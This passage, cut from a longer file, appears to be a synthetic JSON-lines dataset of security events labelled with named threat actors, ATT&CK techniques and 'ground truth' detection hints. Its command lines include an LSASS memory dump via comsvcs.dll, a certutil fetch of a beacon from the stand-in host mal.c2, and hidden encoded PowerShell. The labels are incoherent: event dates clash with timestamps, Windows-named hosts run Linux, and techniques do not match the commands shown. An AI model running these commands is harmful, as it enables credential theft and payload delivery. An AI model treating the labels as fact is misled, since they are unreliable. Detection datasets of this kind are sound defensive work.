MiniDump 2871 C:\\temp\\lsass.dmp full","name":"cmstp.exe","parent_name":"services.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-04-23T05:44:21.000Z","user":{"name":"svc_n46k78244x70","sid":"S-1-5-21-971537679-919898382-1668"}}
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1484.001 using fileless technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Execution","Collection"],"technique_id":"T1484.001"},"event_id":"evt_fin7_20260609T230523000Z_0004649","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["Base64","TLS","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.185.175.199","name":"AZURE-VM-EIG0TU90V3","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4649FIN7T1484.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.31.141.122","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"certutil.exe","parent_name":"explorer.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-08-06T16:52:17.000Z","user":{"name":"arn:aws:iam::n8satwljb8ca","sid":"S-1-5-21-304083337-456749443-8203"}}
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1566.001 using encrypted C2 technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Discovery","Privilege Escalation"],"technique_id":"T1566.001"},"event_id":"evt_lapsus_20260315T005857000Z_0004651","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["LOLBin","JA3 Spoof","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.179.95.149","name":"AZURE-VM-S6PRCTUJOF","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4651Lapsus$T1566.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.127.95.102","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1971 C:\\temp\\lsass.dmp full","name":"wmic.exe","parent_name":"winlogon.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-05-21T13:45:26.000Z","user":{"name":"azuread\\zpys830hvx8o","sid":"S-1-5-21-234523554-477817172-7484"}}
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1484.001 using cloud-native technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Initial Access","Collection"],"technique_id":"T1484.001"},"event_id":"evt_lapsus_20260729T110108000Z_0004653","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["Fileless","LOLBin","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.20.132.249","name":"IAM-ROLE-X4ORONQ924","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4653Lapsus$T1484.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.13.17.98","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1212 C:\\temp\\lsass.dmp full","name":"wmic.exe","parent_name":"svchost.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-11-16T20:58:00.000Z","user":{"name":"arn:aws:iam::xrb3jbexoi6x","sid":"S-1-5-21-812508410-725537789-1263"}}
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1098.004 using cloud-native technique.","sub_technique":"SSH Authorized Keys","tactic":["Lateral Movement","Privilege Escalation"],"technique_id":"T1098.004"},"event_id":"evt_scatteredspider_20250602T210324000Z_0004655","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["TLS","WMI","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.91.234.137","name":"EC2-INST-OUCHPYCDXZ","os":"Amazon Linux 2"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4655Scattered SpiderT1098.004"},"network":{"domain":"aws.amazon.com","dst_ip":"1.177.158.70","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"bitsadmin.exe","parent_name":"svchost.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-01-08T08:11:58.000Z","user":{"name":"arn:aws:iam::0j9bs6prb3v6","sid":"S-1-5-21-728992026-546824443-3545"}}
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1546.003 using LOLBin technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Persistence"],"technique_id":"T1546.003"},"event_id":"evt_unc4841_20261022T042502000Z_0004657","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["WMI","Base64","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.229.224.171","name":"DB-ORACLE-LR9VSESB66","os":"Amazon Linux 2"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4657UNC4841T1546.003"},"network":{"domain":"aws.amazon.com","dst_ip":"1.90.52.235","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"rundll32.exe","parent_name":"services.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-06-27T18:45:43.000Z","user":{"name":"azuread\\b9zru2x3qy3o","sid":"S-1-5-21-450226611-556067603-2093"}}
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1546.003 using encrypted C2 technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Execution"],"technique_id":"T1546.003"},"event_id":"evt_apt29_20250707T082347000Z_0004659","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["Fileless","JA3 Spoof","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.23.113.205","name":"WIN-FIN-SRV-C1X6IMRV6L","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4659APT29T1546.003"},"network":{"domain":"update.microsoft.com","dst_ip":"1.116.207.12","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3001 C:\\temp\\lsass.dmp full","name":"certutil.exe","parent_name":"svchost.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-11-29T17:15:15.000Z","user":{"name":"svc_gj68gz3y3gkg","sid":"S-1-5-21-581365363-259840330-9907"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1570 using encrypted C2 technique.","sub_technique":"Lateral Tool Transfer","tactic":["Privilege Escalation","Lateral Movement"],"technique_id":"T1570"},"event_id":"evt_apt41_20250423T051348000Z_0004661","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["TLS","JA3 Spoof","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.220.208.44","name":"IAM-ROLE-BKRTCI6T4Y","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4661APT41T1570"},"network":{"domain":"update.microsoft.com","dst_ip":"1.187.229.217","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"rundll32.exe","parent_name":"explorer.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-12-20T19:58:49.000Z","user":{"name":"azuread\\47nybaboye79","sid":"S-1-5-21-579785879-974287320-9395"}}
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1484.001 using encrypted C2 technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Collection"],"technique_id":"T1484.001"},"event_id":"evt_apt29_20260901T020636000Z_0004663","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["Base64","TLS","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.114.165.205","name":"APP-WEB-RTJ441H9KU","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4663APT29T1484.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.73.7.183","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"cmstp.exe","parent_name":"services.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-12-10T18:29:17.000Z","user":{"name":"svc_jqfrufkicd2a","sid":"S-1-5-21-800858914-411261274-6935"}}
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1071.001 using encrypted C2 technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Privilege Escalation"],"technique_id":"T1071.001"},"event_id":"evt_fin7_20250810T162924000Z_0004665","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["Fileless","Base64","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.199.133.181","name":"IAM-ROLE-3YV8DCMP39","os":"Amazon Linux 2"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4665FIN7T1071.001"},"network":{"domain":"github.com","dst_ip":"1.184.9.43","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"powershell.exe","parent_name":"services.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-02-25T14:15:30.000Z","user":{"name":"CORP\\rna7oel6c5tk","sid":"S-1-5-21-257580867-359118649-3892"}}
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1021.006 using LOLBin technique.","sub_technique":"Windows Remote Management","tactic":["Discovery","Credential Access","Defense Evasion"],"technique_id":"T1021.006"},"event_id":"evt_lapsus_20250607T172622000Z_0004667","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["Fileless","LOLBin","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.146.84.125","name":"WIN-FIN-SRV-NEWUGX2SA3","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4667Lapsus$T1021.006"},"network":{"domain":"update.microsoft.com","dst_ip":"1.59.172.90","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"rundll32.exe","parent_name":"services.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-10-10T20:16:02.000Z","user":{"name":"CORP\\284icxd33vcs","sid":"S-1-5-21-625014058-107771394-9524"}}
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1098.004 using LOLBin technique.","sub_technique":"SSH Authorized Keys","tactic":["Credential Access"],"technique_id":"T1098.004"},"event_id":"evt_fin7_20250927T182447000Z_0004669","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["WMI","LOLBin","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.181.111.107","name":"WIN-FIN-SRV-U1HJJAXZ0Y","os":"Ubuntu 22.04"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4669FIN7T1098.004"},"network":{"domain":"update.microsoft.com","dst_ip":"1.174.251.112","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2662 C:\\temp\\lsass.dmp full","name":"powershell.exe","parent_name":"svchost.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-01-08T02:57:44.000Z","user":{"name":"svc_b9u9n13s9c4e","sid":"S-1-5-21-328505803-966805132-2244"}}
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1021.006 using encrypted C2 technique.","sub_technique":"Windows Remote Management","tactic":["Execution"],"technique_id":"T1021.006"},"event_id":"evt_lapsus_20250726T130749000Z_0004671","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["WMI","JA3 Spoof","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.57.84.212","name":"AZURE-VM-QQK5RK18BH","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4671Lapsus$T1021.006"},"network":{"domain":"update.microsoft.com","dst_ip":"1.139.125.86","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3251 C:\\temp\\lsass.dmp full","name":"rundll32.exe","parent_name":"explorer.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-11-06T20:49:56.000Z","user":{"name":"azuread\\h3uev9c7lyhv","sid":"S-1-5-21-482798461-635840978-8697"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1021.006 using cloud-native technique.","sub_technique":"Windows Remote Management","tactic":["Persistence","Defense Evasion","Privilege Escalation"],"technique_id":"T1021.006"},"event_id":"evt_apt41_20250609T110105000Z_0004673","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["WMI","JA3 Spoof","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.65.94.8","name":"AZURE-VM-YFY5Y3N6VH","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4673APT41T1021.006"},"network":{"domain":"update.microsoft.com","dst_ip":"1.6.91.230","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"bitsadmin.exe","parent_name":"svchost.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-06-26T09:35:05.000Z","user":{"name":"arn:aws:iam::jgcdvwwpmvbn","sid":"S-1-5-21-410640298-626048844-8852"}}
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1021.006 using cloud-native technique.","sub_technique":"Windows Remote Management","tactic":["Privilege Escalation"],"technique_id":"T1021.006"},"event_id":"evt_volttyphoon_20260515T040159000Z_0004675","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["LOLBin","WMI","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.178.77.214","name":"AZURE-VM-8XILB5JCE3","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4675Volt TyphoonT1021.006"},"network":{"domain":"cdn-content.com","dst_ip":"1.1.211.211","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"bitsadmin.exe","parent_name":"svchost.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-04-26T10:27:28.000Z","user":{"name":"svc_xzk3r7v8lc5h","sid":"S-1-5-21-512035497-301476102-6323"}}
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1003.001 using LOLBin technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Persistence","Defense Evasion"],"technique_id":"T1003.001"},"event_id":"evt_scatteredspider_20261202T150628000Z_0004677","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["LOLBin","Base64","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.40.44.198","name":"IAM-ROLE-PTN3F4A6S2","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4677Scattered SpiderT1003.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.25.57.235","dst_port":8443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3579 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"services.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-03-17T21:07:29.000Z","user":{"name":"CORP\\qy31izlzlt9u","sid":"S-1-5-21-108873283-858103118-2147"}}
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1098.004 using encrypted C2 technique.","sub_technique":"SSH Authorized Keys","tactic":["Initial Access","Reconnaissance","Execution"],"technique_id":"T1098.004"},"event_id":"evt_volttyphoon_20260521T223836000Z_0004679","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["TLS","LOLBin","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.153.254.19","name":"WIN-FIN-SRV-QT7LN2Q84R","os":"Ubuntu 22.04"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4679Volt TyphoonT1098.004"},"network":{"domain":"aws.amazon.com","dst_ip":"1.89.255.16","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"certutil.exe","parent_name":"services.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-06-10T18:19:25.000Z","user":{"name":"azuread\\9kmdulw4gjp3","sid":"S-1-5-21-967090336-876017749-3420"}}
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1546.003 using encrypted C2 technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Discovery","Reconnaissance","Initial Access"],"technique_id":"T1546.003"},"event_id":"evt_fin7_20260727T165123000Z_0004681","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["Base64","Fileless","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.47.168.153","name":"WIN-FIN-SRV-TI5N8IND07","os":"Windows 11"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4681FIN7T1546.003"},"network":{"domain":"cdn-content.com","dst_ip":"1.138.241.142","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 738 C:\\temp\\lsass.dmp full","name":"powershell.exe","parent_name":"services.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-09-23T18:36:05.000Z","user":{"name":"arn:aws:iam::whlawtfq4hxl","sid":"S-1-5-21-209779233-383382406-1646"}}
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1071.001 using LOLBin technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Discovery","Initial Access","Persistence"],"technique_id":"T1071.001"},"event_id":"evt_scatteredspider_20260617T234325000Z_0004683","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["Base64","TLS","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.125.16.198","name":"WIN-FIN-SRV-2WCOKFQ2GU","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4683Scattered SpiderT1071.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.8.255.138","dst_port":443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"wmic.exe","parent_name":"explorer.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-10-20T23:21:06.000Z","user":{"name":"i-eflpd14i89x8","sid":"S-1-5-21-423726883-698706173-6830"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1570 using fileless technique.","sub_technique":"Lateral Tool Transfer","tactic":["Impact","Defense Evasion","Lateral Movement"],"technique_id":"T1570"},"event_id":"evt_apt41_20260819T094750000Z_0004685","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["LOLBin","JA3 Spoof","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.14.168.190","name":"DB-ORACLE-EB763VA5H0","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4685APT41T1570"},"network":{"domain":"github.com","dst_ip":"1.25.162.199","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2085 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"explorer.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-03-23T21:27:44.000Z","user":{"name":"arn:aws:iam::uqhesikgzykt","sid":"S-1-5-21-348298430-923505312-7799"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1546.003 using encrypted C2 technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Execution","Defense Evasion","Initial Access"],"technique_id":"T1546.003"},"event_id":"evt_mustangpanda_20250129T144106000Z_0004687","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["TLS","WMI","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.40.57.4","name":"APP-WEB-TR2NIP2RUV","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4687Mustang PandaT1546.003"},"network":{"domain":"github.com","dst_ip":"1.81.236.167","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"bitsadmin.exe","parent_name":"services.exe"},"source":"Windows Security Log","timestamp":"2026-04-17T06:17:11.000Z","user":{"name":"azuread\\l559fzrsv71t","sid":"S-1-5-21-328761208-716459471-6246"}}
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1531 using LOLBin technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Privilege Escalation","Credential Access","Initial Access"],"technique_id":"T1531"},"event_id":"evt_unc4841_20260809T200311000Z_0004689","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["TLS","Fileless","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.197.32.45","name":"IAM-ROLE-PQNOQ9G5WE","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4689UNC4841T1531"},"network":{"domain":"update.microsoft.com","dst_ip":"1.115.86.156","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1467 C:\\temp\\lsass.dmp full","name":"wmic.exe","parent_name":"svchost.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-08-24T16:54:37.000Z","user":{"name":"svc_gfzndzt8ldmg","sid":"S-1-5-21-583529889-741719977-5773"}}
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1531 using encrypted C2 technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Command and Control"],"technique_id":"T1531"},"event_id":"evt_apt29_20260921T111332000Z_0004691","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Base64","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.208.114.68","name":"WIN-FIN-SRV-KO8EJV326Y","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4691APT29T1531"},"network":{"domain":"cdn-content.com","dst_ip":"1.20.142.80","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"certutil.exe","parent_name":"winlogon.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-04-17T15:39:52.000Z","user":{"name":"azuread\\n6rcrmm409c4","sid":"S-1-5-21-163945300-437337273-8036"}}
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1546.003 using fileless technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Privilege Escalation","Initial Access"],"technique_id":"T1546.003"},"event_id":"evt_apt29_20261130T055144000Z_0004693","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["LOLBin","JA3 Spoof","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.255.241.23","name":"APP-WEB-5N6QRR9847","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4693APT29T1546.003"},"network":{"domain":"github.com","dst_ip":"1.91.215.34","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1681 C:\\temp\\lsass.dmp full","name":"cmstp.exe","parent_name":"explorer.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-03-23T01:28:56.000Z","user":{"name":"CORP\\73qstgdsbybw","sid":"S-1-5-21-843351371-721596455-9597"}}
